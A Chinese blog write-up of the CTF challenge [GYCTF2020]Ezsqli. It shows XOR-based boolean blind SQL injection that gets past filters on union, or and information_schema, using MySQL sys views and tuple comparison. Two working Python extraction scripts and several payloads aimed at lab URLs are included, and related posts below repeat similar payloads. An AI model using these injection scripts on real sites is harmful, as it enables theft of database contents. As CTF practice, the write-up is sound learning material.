[GYCTF2020]Ezsqli

最新推荐文章于 2024-03-22 07:00:00 发布
最新推荐文章于 2024-03-22 07:00:00 发布
阅读量1.2k 收藏 1
点赞数 2
分类专栏: # ctf做题记录 sql注入 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/115447291
版权

在这里插入图片描述
查询界面,猜测sql注入,查询抓包
在这里插入图片描述

fuzz后发现information_schema,or,union等关键字被过滤了,应该是要无列名注入。
^代替or
id=0^(length(database())>1)
在这里插入图片描述
证明存在sql注入
InnoDb引擎
从MYSQL5.5.8开始,InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中,inndb增加了innodb_index_stats和innodb_table_stats两张表,这两张表中都存储了数据库和其数据表的信息,但是没有存储列名。
sys数据库
在5.7以上的MYSQL中,新增了sys数据库,该库的基础数据来自information_schema和performance_chema,其本身不存储数据。可以通过其中的schema_auto_increment_columns来获取表名。
用脚本爆出表名

import time
import requests
import sys
import string
import logging


# LOG_FORMAT = "%(lineno)d - %(asctime)s - %(levelname)s - %(message)s"
# logging.basicConfig(level=logging.DEBUG, format=LOG_FORMAT)
target="http://089d87c8-7a75-454d-9806-a634e110dee5.node3.buuoj.cn/index.php"

dataStr="(select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema=database())"

def binaryTest(i,cu,comparer):
    s=requests.post(target,data={"id" : "0^(ascii(substr({},{},1)){comparer}{})".format(dataStr,i,cu,comparer=comparer)})
    if 'Nu1L' in s.text:
        return True
    else:
        return False


def searchFriends_sqli(i):
    l = 0
    r = 255
    while (l <= r):
        cu = (l + r) // 2
        if (binaryTest(i, cu, "<")):
            r = cu - 1
        elif (binaryTest(i, cu, ">")):
            l = cu + 1
        elif (cu == 0):
            return None
        else:
            return chr(cu)


def main():
    print("start")
    finres=""
    i=1
    while (True):
        extracted_char = searchFriends_sqli(i)
        if (extracted_char == None):
            break
        finres += extracted_char
        i += 1
        print("(+) 当前结果:"+finres)
    print("(+) 运行完成,结果为:", finres)

if __name__=="__main__":
    main()

在这里插入图片描述
过滤了union的无列名注入没学过 参考y1ng师傅的wp
https://www.gem-love.com/ctf/1782.html
看完只能感叹大佬tql
核心思想

假设 flag 为 flag {bbbbb},对于 payload 这个两个 select 查询的比较,是按位比较的,即先比第一位,如果相等则比第二位,以此类推;在某一位上,如果前者的 ASCII 大,不管总长度如何,ASCII 大的则大,这个不难懂,和 c 语言的 strcmp() 函数原理一样,举几个例子:
glag > flag{bbbbb}
alag{zzzzzzzzzzz} < flag{bbbbb}
a < flag{bbbbb}
z > flag{bbbbb}
在这样的按位比较过程中,因为在里层的 for() 循环,字典顺序是从 ASCII 码小到大来枚举并比较的,假设正确值为 b,那么字典跑到 b 的时候 b=b 不满足 payload 的大于号,只能继续下一轮循环,c>b 此时满足了,题目返回真,出现了 Nu1L 关键字,这个时候就需要记录 flag 的值了,但是此时这一位的 char 是 c,而真正的 flag 的这一位应该是 b 才对,所以 flag += chr(char-1),这就是为什么在存 flag 时候要往前偏移一位的原因

脚本

import requests
import time
url = 'http://bbec0b5f-0d5c-406b-ba6d-d0391a76b959.node3.buuoj.cn/index.php'
# give_grandpa_pa_pa_pa

payload_flag = '1^((1,\'{}\')>(select * from f1ag_1s_h3r3_hhhhh))'
flag = ''
for i in range(1, 100):
    time.sleep(0.3)#这里要sleep一下,不然太快了会乱码,本人测试后0.3正好能出结果
    low = 32
    high = 132
    mid = (low + high) // 2
    while (low < high):
        k = flag + chr(mid)
        payload = payload_flag.format(k)
        data = {"id": payload}
        print(payload)
        r = requests.post(url=url, data=data)
        if 'Nu1L' in r.text:
            low = mid + 1
        else:
            high = mid

        mid = (low + high) // 2
    if mid == 33:
        break
    flag += chr(mid - 1)
    print(flag.lower())  # 因为出来的flag是大写,这边全部转为小写

print(flag.lower())

在这里插入图片描述

fmyyy1
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP登录环节防止sql注入的方法浅析
10-25
主要介绍了PHP登录环节防止sql注入的方法,需要的朋友可以参考下
BUU[GYCTF2020]Ezsqli1
weixin_46245411的博客
07-19 597
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 知识点 一、布尔盲注 二、无列名注入 1.知识点 2.实现方式 总结 知识点 布尔盲注以及无列名注入 提示:以下是本篇文章正文内容,下面案例可供参考 一、布尔盲注 在提交部分输入值上传,抓包查看 修改POST传参id的部分值为其他值后 这里就判断出大致使用BOOL盲注来注入 简单的写一段万能SQL语句后 下一步使用字典去fuzz一下,查看有哪些关键词被...
[GYCTF2020]Ezsqli(Mysql逐位比较)
D.MIND 的博客
04-23 495
前言 用到异或注入、bool盲注,这题我感觉最重要的还是理解mysql是如何比较字符串的 与利用 逐位比较 来配合盲注 文章目录前言`sys.schema_table_statistics_with_buffer`查表mysql字符串 逐位比较大小总结 这题关键过滤了union 、if 、sleep与 information,当然常规的or 和 and也是过滤了的 一开始看到 if 和sleep被过滤了就没有往延时注入、union注入上想 异或注入就成了我的首选! 测试一下 id=1 ^ 1# Error
[GYCTF2020]Ezsqli ---不会编程的崽
最新发布
不会编程的崽的博客
03-22 418
既然知道是sql注入就不墨迹了。初步判断盲注,判断盲注的方发不用说了吧,然后fuzz一下,information被过滤了。再次可以判断为盲注与无列名注入。因为无列名注入无法获得列名,不能使用普通盲注,而且这里也无法使用union select。来尝试一下新的方法吧。管他有列名还是无列名,先找到表。由于information被过滤了。这是比较形象的解释。所以构造payload。这题不难,难的是不知道有哪些表可以利用,不知道这种比较方法。又是sql新题型哦。最后在转化为小写就可以提交了。脚本写的不好,请见谅。
[GYCTF2020]Ezsqli(无列名注入)
weixin_43940853的博客
05-16 4986
[GYCTF2020]Ezsqli 过滤了好多东西,包括用来查询的information关键词,本上就是考虑盲注了 当||后面条件为真时返回Nu1L,为假时返回V&N,这就是判断盲注语句是否成立的关键 接下来就可以写脚本判断表名了 import requests url = 'http://bfd71058-3cf0-4e87-8731-8935a651f051.node3.buuoj.cn/' payload = '2||ascii(substr((select group_concat
(四)[GYCTF2020]Ezsqli(bool 盲注,无列名注入)
qq_53856457的博客
11-25 613
打开,经典查询框,先随意提交1,post数据,抓包看一下 burp fuzz测试一下,可以看到常用的information,information_schema,or,union等关键字被过滤了,简单尝试后,发现没有回显,也没有报错,当语句为真时返回Nu1L,为假时返回V&N,考虑布尔盲注。 注:补充!!! InnoDb引擎 从MYSQL5.5.8开始,InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中,inndb增加了innodb_index_stats和innodb_tabl
BUUCTF WEB Ezsqli
qq_41696858的博客
04-01 5382
继续刷题,comment之前在攻防世界刷过了,就不刷了。从题目上我们就知道这一题是个sql注入题 打开场景,我们发现依旧的儒雅随和 一个查询框,那么就是要硬搞了呗 经查询1,2是两条有效数字,0和其他的都是非法输入 1+1成功回显2,下面就是过滤字判断 既然是布尔型的回显,先试试0^1,嗯,异或符给我们留下了 布尔类型查用的substr,ascii先试试 0^(ascii(substr(‘hello’,1,1))>1) 1^(ascii(substr(‘hello’,1,1))>1) 成功回显,
[GYCTF2020]Ezsqli1
m0_62805300的博客
05-02 1712
有相应的回显 可以对其进行盲注 长为507的是被过滤的 输入1&&(ascii(substr(database(),1,1))>32)# 成功回显则可用来盲注 借鉴大佬脚本 import requests import time url = 'http://a713b075-e461-480d-82a8-36c99d85f52e.node3.buuoj.cn' i = 0 flag = '' while True: i += 1 beg...
[GYCTF2020]Ezsqli --BUUCTF
金 帛的博客
06-12 690
BUUCTF记录贴
information_schema过滤与无列名注入
snowlyzz的博客
09-06 1220
information_schema过滤与无列名注入
Bypass information_schema
mi900709的博客
12-02 627
Bypass information_schema 前言 聊一聊mysql在被waf禁掉了information_schema库后还能有哪些利用思路,这个想法是前一段时间想到的,这次趁着安全客活动就在这里记录一下吧~ 实验环境 windows 2008 r2 phpstudy (mysql 5.7) 某waf(原因是该waf可以设置非法访问information_schema数据库) 前置任务 进行bypass之前先了解一下mysql中的information_schma这个库是干嘛的,在SQ
mysql注入绕过information_schema过滤
b1ackc4t的博客
10-19 5639
1.利用mysql5.7新增的sys.schema_auto_increment_columns 这是sys数据库下的一个视图,基础数据来自与information_schema,他的作用是对表的自增ID进行监控,也就是说,如果某张表存在自增ID,就可以通过该视图来获取其表名和所在数据库名 以下为该视图的所有列 2.sys.schema_table_statistics_with_buffer 这是sys数据库下的视图,里面存储着所有数据库所有表的统计信息 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值